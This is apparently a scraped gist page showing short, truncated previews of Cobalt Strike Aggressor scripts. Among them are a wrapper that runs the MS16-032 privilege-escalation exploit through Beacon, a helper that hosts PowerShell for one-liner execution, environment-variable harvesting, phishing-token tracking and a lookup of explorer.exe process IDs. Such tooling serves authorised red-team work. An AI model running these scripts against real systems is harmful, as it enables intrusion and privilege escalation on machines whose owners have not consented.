This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
global('%checkins'); | |
on beacon_checkin { | |
local('$last'); | |
if ($1 in %checkins) { | |
$last = %checkins[$1]; | |
# has it been 1m since the last task acknowledgement? | |
if (($3 - $last) > 60000) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon | |
# | |
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later) | |
# 1. grab MS16-032.ps1 | |
# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1 | |
# 2. store it with this script | |
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack | |
# logic to run this particular attack | |
sub exploit { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import aggressor.windows.BeaconConsole; | |
import java.awt.event.ActionEvent; | |
# $1 = beacon ID | |
# $2 = command + args to run [as if you typed it in the console] | |
sub beacon_input_command { | |
local('$event'); | |
# we make the console a static var because each console we create subscribes to a bunch of stuff | |
# and requires a manual step [normally performed by a Window close event] to clean up these things. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# host a PowerShell script on a one-off web server via Beacon. | |
# | |
# Why? Generate one-liners for length constrained command execution opportunities | |
# | |
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate! | |
# if there's interest in this capability, I can build an official API for it. | |
import common.*; | |
import beacon.*; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# safe delete in file browser right-click menu | |
# | |
popup_clear("filebrowser"); | |
popup filebrowser { | |
item "&Download" { | |
local('$file'); | |
foreach $file ($3) { | |
bdownload($1, "$2 $+ \\ $+ $file"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Aggressor Script means to parse/use environment vars in a Beacon session. | |
# | |
global('%bvars'); | |
# request environment variables for every new Beacon that comes in. | |
on beacon_initial { | |
# ideally, we'd have a bshell that could take callbacks. We don't have | |
# this yet. Eventually though, we will. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to | |
# resolve the id var (token) to an email | |
# | |
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html | |
# | |
# method, uri, addr, ua, response, size, handler, when | |
set WEB_HIT { | |
local('$out $now $method $uri $addr $ua $response $size $handler $when $params'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# getexplorerpid($bid, &callback); | |
sub getexplorerpid { | |
bps($1, lambda({ | |
local('$pid $name $entry'); | |
foreach $entry (split("\n", $2)) { | |
($name, $pid) = split("\\s+", $entry); | |
if ($name eq "explorer.exe") { | |
# $1 is our Beacon ID, $pid is the PID of explorer.exe | |
[$callback: $1, $pid]; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# getexplorerpid($bid, &callback); | |
sub getanypid { | |
bps($1, lambda({ | |
local('$pid $name $entry'); | |
foreach $entry (split("\n", $2)) { | |
($name, $pid) = split("\\s+", $entry); | |
if ($name eq $proc) { | |
# $1 is our Beacon ID, $pid is the PID of $proc | |
[$callback: $1, $proc, $pid]; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# demonstrate an example of inversion-of-control with Aggressor Script | |
# | |
# co-routine, | |
sub bot { | |
# run pwd and get the output. | |
bpwd($bid); | |
when("beacon_output_alt", $this); | |
yield; |